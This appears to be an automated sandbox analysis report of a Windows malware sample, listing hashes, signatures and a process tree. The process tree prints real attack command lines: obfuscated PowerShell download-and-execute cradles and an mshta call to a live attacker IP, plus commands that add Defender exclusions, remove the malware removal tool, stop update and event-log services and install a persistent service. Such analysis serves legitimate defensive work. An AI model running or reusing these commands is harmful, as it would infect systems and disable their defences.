Analysis
max time kernel: 150s
max time network: 133s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64 arch:x86 image:win7-20240708-en locale:en-us os:windows7-x64 system
submitted: 21-11-2024 19:11
Static task: static1
Behavioral task: behavioral1 (Sample: file.exe; Resource: win7-20240708-en)
Behavioral task: behavioral2 (Sample: file.exe; Resource: win10v2004-20241007-en)
General
Target: file.exe
Size: 50KB
MD5: 666248c216a3f63828f739839230f9f6
SHA1: 13690837235053762a538b4c5b2b601ec9f6bb22
SHA256: 00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da
SHA512: 37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde
SSDEEP: 768:CT6n3V7i+V39HhHw98cje6O7UgYWE8knmbN8vnoK:7i+/BHw98cyoWE8ks8vnp
Malware Config
Extracted: http://176.113.115.178/FF/2.png
Extracted: http://176.113.115.178/FF/3.png
Extracted: http://176.113.115.178/Windows-Update
Extracted: http://176.113.115.178/FF/1.png
Signatures
Modifies security service 2 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP | svchost.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection | svchost.exe
UAC bypass 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | powershell.exe
Blocklisted process makes network request 4 IoCs
flow | pid | Process
5 | 2748 | powershell.exe
6 | 2724 | powershell.exe
8 | 2708 | mshta.exe
10 | 2416 | powershell.exe
Command and Scripting Interpreter: PowerShell 6 IoCs
pid | Process
2724 | powershell.exe
2748 | powershell.exe
2416 | powershell.exe
1724 | powershell.exe
1544 | powershell.exe
2544 | powershell.exe
Creates new service(s) 2 TTPs
Sets service image path in registry 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\LIB\ImagePath = "C:\\ProgramData\\Mig\\Mig.exe" | services.exe
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Mig.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Mig.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | LB31.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | LB31.exe
Executes dropped EXE 2 IoCs
pid | Process
816 | LB31.exe
2068 | Mig.exe
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx | svchost.exe
Loads dropped DLL 2 IoCs
pid | Process
2416 | powershell.exe
476 | services.exe
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
1236 | powercfg.exe
1500 | powercfg.exe
2304 | powercfg.exe
1444 | powercfg.exe
2916 | powercfg.exe
2948 | powercfg.exe
908 | powercfg.exe
308 | powercfg.exe
Drops file in System32 directory 4 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | LB31.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | Mig.exe
Suspicious use of SetThreadContext 4 IoCs
description | pid | Process | procid_target
PID 816 set thread context of 2444 | 816 | LB31.exe | 67
PID 2068 set thread context of 2200 | 2068 | Mig.exe | 98
PID 2068 set thread context of 1576 | 2068 | Mig.exe | 102
PID 2068 set thread context of 2136 | 2068 | Mig.exe | 103
Drops file in Windows directory 3 IoCs
description | ioc | Process
File created | C:\Windows\wusa.lock | wusa.exe
File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | svchost.exe
File created | C:\Windows\wusa.lock | wusa.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1088 | sc.exe
2060 | sc.exe
2096 | sc.exe
1572 | sc.exe
628 | sc.exe
2040 | sc.exe
3004 | sc.exe
1928 | sc.exe
1652 | sc.exe
3028 | sc.exe
1932 | sc.exe
1600 | sc.exe
2040 | sc.exe
2496 | sc.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid | Process
2876 | ipconfig.exe
Modifies Internet Explorer settings 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 2020c54c493cdb01 | powershell.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2724 | powershell.exe
2748 | powershell.exe
2724 | powershell.exe
2724 | powershell.exe
2416 | powershell.exe
1724 | powershell.exe
2416 | powershell.exe
2416 | powershell.exe
816 | LB31.exe
1544 | powershell.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
816 | LB31.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
816 | LB31.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
816 | LB31.exe
816 | LB31.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2068 | Mig.exe
2444 | dialer.exe
2444 | dialer.exe
2544 | powershell.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2444 | dialer.exe
2068 | Mig.exe
2068 | Mig.exe
2068 | Mig.exe
2068 | Mig.exe
2068 | Mig.exe
2068 | Mig.exe
2444 | dialer.exe
2444 | dialer.exe
2068 | Mig.exe
2068 | Mig.exe
2068 | Mig.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2724 | powershell.exe
Token: SeDebugPrivilege | 2748 | powershell.exe
Token: SeDebugPrivilege | 2416 | powershell.exe
Token: SeDebugPrivilege | 1724 | powershell.exe
Token: SeDebugPrivilege | 1544 | powershell.exe
Token: SeDebugPrivilege | 2444 | dialer.exe
Token: SeShutdownPrivilege | 2304 | powercfg.exe
Token: SeShutdownPrivilege | 1236 | powercfg.exe
Token: SeShutdownPrivilege | 1500 | powercfg.exe
Token: SeShutdownPrivilege | 308 | powercfg.exe
Token: SeAuditPrivilege | 828 | svchost.exe
Token: SeDebugPrivilege | 2544 | powershell.exe
Token: SeDebugPrivilege | 2200 | dialer.exe
Token: SeShutdownPrivilege | 1444 | powercfg.exe
Token: SeShutdownPrivilege | 908 | powercfg.exe
Token: SeShutdownPrivilege | 2916 | powercfg.exe
Token: SeShutdownPrivilege | 2948 | powercfg.exe
Token: SeLockMemoryPrivilege | 2136 | dialer.exe
Token: SeAssignPrimaryTokenPrivilege | 828 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 828 | svchost.exe
Token: SeSecurityPrivilege | 828 | svchost.exe
Token: SeTakeOwnershipPrivilege | 828 | svchost.exe
Token: SeLoadDriverPrivilege | 828 | svchost.exe
Token: SeSystemtimePrivilege | 828 | svchost.exe
Token: SeBackupPrivilege | 828 | svchost.exe
Token: SeRestorePrivilege | 828 | svchost.exe
Token: SeShutdownPrivilege | 828 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 828 | svchost.exe
Token: SeUndockPrivilege | 828 | svchost.exe
Token: SeManageVolumePrivilege | 828 | svchost.exe
Token: SeAssignPrimaryTokenPrivilege | 828 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 828 | svchost.exe
Token: SeSecurityPrivilege | 828 | svchost.exe
Token: SeTakeOwnershipPrivilege | 828 | svchost.exe
Token: SeLoadDriverPrivilege | 828 | svchost.exe
Token: SeSystemtimePrivilege | 828 | svchost.exe
Token: SeBackupPrivilege | 828 | svchost.exe
Token: SeRestorePrivilege | 828 | svchost.exe
Token: SeShutdownPrivilege | 828 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 828 | svchost.exe
Token: SeUndockPrivilege | 828 | svchost.exe
Token: SeManageVolumePrivilege | 828 | svchost.exe
Token: SeAssignPrimaryTokenPrivilege | 828 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 828 | svchost.exe
Token: SeSecurityPrivilege | 828 | svchost.exe
Token: SeTakeOwnershipPrivilege | 828 | svchost.exe
Token: SeLoadDriverPrivilege | 828 | svchost.exe
Token: SeSystemtimePrivilege | 828 | svchost.exe
Token: SeBackupPrivilege | 828 | svchost.exe
Token: SeRestorePrivilege | 828 | svchost.exe
Token: SeShutdownPrivilege | 828 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 828 | svchost.exe
Token: SeUndockPrivilege | 828 | svchost.exe
Token: SeManageVolumePrivilege | 828 | svchost.exe
Token: SeAssignPrimaryTokenPrivilege | 828 | svchost.exe
Token: SeIncreaseQuotaPrivilege | 828 | svchost.exe
Token: SeSecurityPrivilege | 828 | svchost.exe
Token: SeTakeOwnershipPrivilege | 828 | svchost.exe
Token: SeLoadDriverPrivilege | 828 | svchost.exe
Token: SeSystemtimePrivilege | 828 | svchost.exe
Token: SeBackupPrivilege | 828 | svchost.exe
Token: SeRestorePrivilege | 828 | svchost.exe
Token: SeShutdownPrivilege | 828 | svchost.exe
Token: SeSystemEnvironmentPrivilege | 828 | svchost.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 1476 wrote to memory of 2364 | 1476 | file.exe | 30
PID 1476 wrote to memory of 2364 | 1476 | file.exe | 30
PID 1476 wrote to memory of 2364 | 1476 | file.exe | 30
PID 2364 wrote to memory of 2724 | 2364 | wscript.exe | 31
PID 2364 wrote to memory of 2724 | 2364 | wscript.exe | 31
PID 2364 wrote to memory of 2724 | 2364 | wscript.exe | 31
PID 2364 wrote to memory of 2748 | 2364 | wscript.exe | 33
PID 2364 wrote to memory of 2748 | 2364 | wscript.exe | 33
PID 2364 wrote to memory of 2748 | 2364 | wscript.exe | 33
PID 2724 wrote to memory of 2584 | 2724 | powershell.exe | 35
PID 2724 wrote to memory of 2584 | 2724 | powershell.exe | 35
PID 2724 wrote to memory of 2584 | 2724 | powershell.exe | 35
PID 2584 wrote to memory of 2060 | 2584 | WScript.exe | 37
PID 2584 wrote to memory of 2060 | 2584 | WScript.exe | 37
PID 2584 wrote to memory of 2060 | 2584 | WScript.exe | 37
PID 2060 wrote to memory of 2708 | 2060 | cmd.exe | 39
PID 2060 wrote to memory of 2708 | 2060 | cmd.exe | 39
PID 2060 wrote to memory of 2708 | 2060 | cmd.exe | 39
PID 2748 wrote to memory of 2876 | 2748 | powershell.exe | 40
PID 2748 wrote to memory of 2876 | 2748 | powershell.exe | 40
PID 2748 wrote to memory of 2876 | 2748 | powershell.exe | 40
PID 2708 wrote to memory of 2416 | 2708 | mshta.exe | 41
PID 2708 wrote to memory of 2416 | 2708 | mshta.exe | 41
PID 2708 wrote to memory of 2416 | 2708 | mshta.exe | 41
PID 2416 wrote to memory of 1724 | 2416 | powershell.exe | 43
PID 2416 wrote to memory of 1724 | 2416 | powershell.exe | 43
PID 2416 wrote to memory of 1724 | 2416 | powershell.exe | 43
PID 2416 wrote to memory of 816 | 2416 | powershell.exe | 44
PID 2416 wrote to memory of 816 | 2416 | powershell.exe | 44
PID 2416 wrote to memory of 816 | 2416 | powershell.exe | 44
PID 1088 wrote to memory of 1632 | 1088 | cmd.exe | 53
PID 1088 wrote to memory of 1632 | 1088 | cmd.exe | 53
PID 1088 wrote to memory of 1632 | 1088 | cmd.exe | 53
PID 816 wrote to memory of 2444 | 816 | LB31.exe | 67
PID 816 wrote to memory of 2444 | 816 | LB31.exe | 67
PID 816 wrote to memory of 2444 | 816 | LB31.exe | 67
PID 816 wrote to memory of 2444 | 816 | LB31.exe | 67
PID 816 wrote to memory of 2444 | 816 | LB31.exe | 67
PID 816 wrote to memory of 2444 | 816 | LB31.exe | 67
PID 816 wrote to memory of 2444 | 816 | LB31.exe | 67
PID 2444 wrote to memory of 420 | 2444 | dialer.exe | 5
PID 2444 wrote to memory of 476 | 2444 | dialer.exe | 6
PID 2444 wrote to memory of 484 | 2444 | dialer.exe | 7
PID 2444 wrote to memory of 492 | 2444 | dialer.exe | 8
PID 2444 wrote to memory of 588 | 2444 | dialer.exe | 9
PID 2444 wrote to memory of 668 | 2444 | dialer.exe | 10
PID 2444 wrote to memory of 740 | 2444 | dialer.exe | 11
PID 2444 wrote to memory of 800 | 2444 | dialer.exe | 12
PID 2444 wrote to memory of 828 | 2444 | dialer.exe | 13
PID 2444 wrote to memory of 952 | 2444 | dialer.exe | 15
PID 2444 wrote to memory of 236 | 2444 | dialer.exe | 16
PID 2444 wrote to memory of 1012 | 2444 | dialer.exe | 17
PID 2444 wrote to memory of 900 | 2444 | dialer.exe | 18
PID 2444 wrote to memory of 1104 | 2444 | dialer.exe | 19
PID 2444 wrote to memory of 1160 | 2444 | dialer.exe | 20
PID 2444 wrote to memory of 1184 | 2444 | dialer.exe | 21
PID 2444 wrote to memory of 1228 | 2444 | dialer.exe | 23
PID 2444 wrote to memory of 1520 | 2444 | dialer.exe | 25
PID 2444 wrote to memory of 2056 | 2444 | dialer.exe | 26
PID 2444 wrote to memory of 1912 | 2444 | dialer.exe | 27
PID 2444 wrote to memory of 3056 | 2444 | dialer.exe | 36
PID 2444 wrote to memory of 816 | 2444 | dialer.exe | 44
PID 2444 wrote to memory of 2304 | 2444 | dialer.exe | 60
PID 2444 wrote to memory of 1500 | 2444 | dialer.exe | 61
Processes
(tree depth in brackets; each entry lists image path, PID, command line and matched signatures)
[1] C:\Windows\system32\winlogon.exe (PID 420)
    cmdline: winlogon.exe
[1] C:\Windows\system32\services.exe (PID 476)
    cmdline: C:\Windows\system32\services.exe
    - Sets service image path in registry
    - Loads dropped DLL
  [2] C:\Windows\system32\svchost.exe (PID 588)
      cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch
    [3] C:\Windows\system32\DllHost.exe (PID 1520)
        cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    [3] C:\Windows\system32\wbem\wmiprvse.exe (PID 3056)
        cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        - Checks processor information in registry
  [2] C:\Windows\system32\svchost.exe (PID 668)
      cmdline: C:\Windows\system32\svchost.exe -k RPCSS
  [2] C:\Windows\System32\svchost.exe (PID 740)
      cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
      - Modifies security service
      - Indicator Removal: Clear Windows Event Logs
  [2] C:\Windows\System32\svchost.exe (PID 800)
      cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    [3] C:\Windows\system32\Dwm.exe (PID 1160)
        cmdline: "C:\Windows\system32\Dwm.exe"
  [2] C:\Windows\system32\svchost.exe (PID 828)
      cmdline: C:\Windows\system32\svchost.exe -k netsvcs
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\svchost.exe (PID 952)
      cmdline: C:\Windows\system32\svchost.exe -k LocalService
  [2] C:\Windows\system32\svchost.exe (PID 236)
      cmdline: C:\Windows\system32\svchost.exe -k NetworkService
  [2] C:\Windows\System32\spoolsv.exe (PID 1012)
      cmdline: C:\Windows\System32\spoolsv.exe
  [2] C:\Windows\system32\svchost.exe (PID 900)
      cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  [2] C:\Windows\system32\taskhost.exe (PID 1104)
      cmdline: "taskhost.exe"
  [2] C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (PID 1228)
      cmdline: "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  [2] C:\Windows\system32\svchost.exe (PID 2056)
      cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  [2] C:\Windows\system32\sppsvc.exe (PID 1912)
      cmdline: C:\Windows\system32\sppsvc.exe
  [2] C:\ProgramData\Mig\Mig.exe (PID 2068)
      cmdline: C:\ProgramData\Mig\Mig.exe
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 2544)
        cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe (PID 2212)
        cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      [4] C:\Windows\system32\wusa.exe (PID 2412)
          cmdline: wusa /uninstall /kb:890830 /quiet /norestart
          - Drops file in Windows directory
    [3] C:\Windows\system32\sc.exe (PID 2060)
        cmdline: C:\Windows\system32\sc.exe stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe (PID 2496)
        cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe (PID 1572)
        cmdline: C:\Windows\system32\sc.exe stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe (PID 1652)
        cmdline: C:\Windows\system32\sc.exe stop bits
        - Launches sc.exe
    [3] C:\Windows\system32\sc.exe (PID 2096)
        cmdline: C:\Windows\system32\sc.exe stop dosvc
        - Launches sc.exe
    [3] C:\Windows\system32\powercfg.exe (PID 908)
        cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\powercfg.exe (PID 2948)
        cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\powercfg.exe (PID 2916)
        cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\powercfg.exe (PID 1444)
        cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\dialer.exe (PID 2200)
        cmdline: C:\Windows\system32\dialer.exe
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\dialer.exe (PID 1576)
        cmdline: C:\Windows\system32\dialer.exe
    [3] C:\Windows\system32\dialer.exe (PID 2136)
        cmdline: dialer.exe
        - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\lsass.exe (PID 484)
    cmdline: C:\Windows\system32\lsass.exe
[1] C:\Windows\system32\lsm.exe (PID 492)
    cmdline: C:\Windows\system32\lsm.exe
[1] C:\Windows\Explorer.EXE (PID 1184)
    cmdline: C:\Windows\Explorer.EXE
  [2] C:\Users\Admin\AppData\Local\Temp\file.exe (PID 1476)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\file.exe"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\wscript.exe (PID 2364)
        cmdline: "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2724)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WScript.exe (PID 2584)
            cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\System32\cmd.exe (PID 2060)
              cmdline: "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\mshta.exe (PID 2708)
                cmdline: mshta http://176.113.115.178/Windows-Update
                - Blocklisted process makes network request
                - Modifies Internet Explorer settings
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2416)
                  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  - UAC bypass
                  - Blocklisted process makes network request
                  - Command and Scripting Interpreter: PowerShell
                  - Loads dropped DLL
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1724)
                    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                [9] C:\Users\Admin\AppData\Roaming\LB31.exe (PID 816)
                    cmdline: "C:\Users\Admin\AppData\Roaming\LB31.exe"
                    - Checks BIOS information in registry
                    - Executes dropped EXE
                    - Drops file in System32 directory
                    - Suspicious use of SetThreadContext
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of WriteProcessMemory
                  [10] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (PID 1544)
                      cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                      - Command and Scripting Interpreter: PowerShell
                      - Drops file in System32 directory
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
                  [10] C:\Windows\system32\cmd.exe (PID 1088)
                      cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                      - Suspicious use of WriteProcessMemory
                    [11] C:\Windows\system32\wusa.exe (PID 1632)
                        cmdline: wusa /uninstall /kb:890830 /quiet /norestart
                        - Drops file in Windows directory
                  [10] C:\Windows\system32\sc.exe (PID 628)
                      cmdline: C:\Windows\system32\sc.exe stop UsoSvc
                      - Launches sc.exe
                  [10] C:\Windows\system32\sc.exe (PID 3028)
                      cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
                      - Launches sc.exe
                  [10] C:\Windows\system32\sc.exe (PID 2040)
                      cmdline: C:\Windows\system32\sc.exe stop wuauserv
                      - Launches sc.exe
                  [10] C:\Windows\system32\sc.exe (PID 1932)
                      cmdline: C:\Windows\system32\sc.exe stop bits
                      - Launches sc.exe
                  [10] C:\Windows\system32\sc.exe (PID 3004)
                      cmdline: C:\Windows\system32\sc.exe stop dosvc
                      - Launches sc.exe
                  [10] C:\Windows\system32\powercfg.exe (PID 2304)
                      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      - Power Settings
                      - Suspicious use of AdjustPrivilegeToken
                  [10] C:\Windows\system32\powercfg.exe (PID 1500)
                      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                      - Power Settings
                      - Suspicious use of AdjustPrivilegeToken
                  [10] C:\Windows\system32\powercfg.exe (PID 1236)
                      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      - Power Settings
                      - Suspicious use of AdjustPrivilegeToken
                  [10] C:\Windows\system32\powercfg.exe (PID 308)
                      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                      - Power Settings
                      - Suspicious use of AdjustPrivilegeToken
                  [10] C:\Windows\system32\dialer.exe (PID 2444)
                      cmdline: C:\Windows\system32\dialer.exe
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
                      - Suspicious use of WriteProcessMemory
                  [10] C:\Windows\system32\sc.exe (PID 1600)
                      cmdline: C:\Windows\system32\sc.exe delete "LIB"
                      - Launches sc.exe
                  [10] C:\Windows\system32\sc.exe (PID 1928)
                      cmdline: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
                      - Launches sc.exe
                  [10] C:\Windows\system32\sc.exe (PID 2040)
                      cmdline: C:\Windows\system32\sc.exe stop eventlog
                      - Launches sc.exe
                  [10] C:\Windows\system32\sc.exe (PID 1088)
                      cmdline: C:\Windows\system32\sc.exe start "LIB"
                      - Launches sc.exe
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2748)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\ipconfig.exe (PID 2876)
            cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns
            - Gathers network information
[1] C:\Windows\system32\conhost.exe (PID 748)
    cmdline: \??\C:\Windows\system32\conhost.exe "801325826392213766-684801762-1514971320-3167538293504300531048228479-594169369"
[1] C:\Windows\system32\conhost.exe (PID 876)
    cmdline: \??\C:\Windows\system32\conhost.exe "-469403973-195241372311397752938903216760427271523894250-1822948152388675340"
[1] C:\Windows\system32\conhost.exe (PID 872)
    cmdline: \??\C:\Windows\system32\conhost.exe "-1523105627157793749218311390-1581607404-196312157719098908026944710692050083376"
[1] C:\Windows\system32\conhost.exe (PID 1700)
    cmdline: \??\C:\Windows\system32\conhost.exe "-1329467824-1414799993172582698947069995-26073194845582170620347478321547740039"
[1] C:\Windows\system32\conhost.exe (PID 2832)
    cmdline: \??\C:\Windows\system32\conhost.exe "1233678843-12358472911183455941-1089575767-10829828292090969313-865768296-1514755288"
[1] C:\Windows\system32\conhost.exe (PID 1792)
    cmdline: \??\C:\Windows\system32\conhost.exe "-1073836127117207565812143415521077113278-1878961076-183311156-13669789571473316583"
[1] C:\Windows\system32\conhost.exe (PID 1480)
    cmdline: \??\C:\Windows\system32\conhost.exe "-255934328-6843181432057467296-778761170-26448962310547516411389132376-822758601"
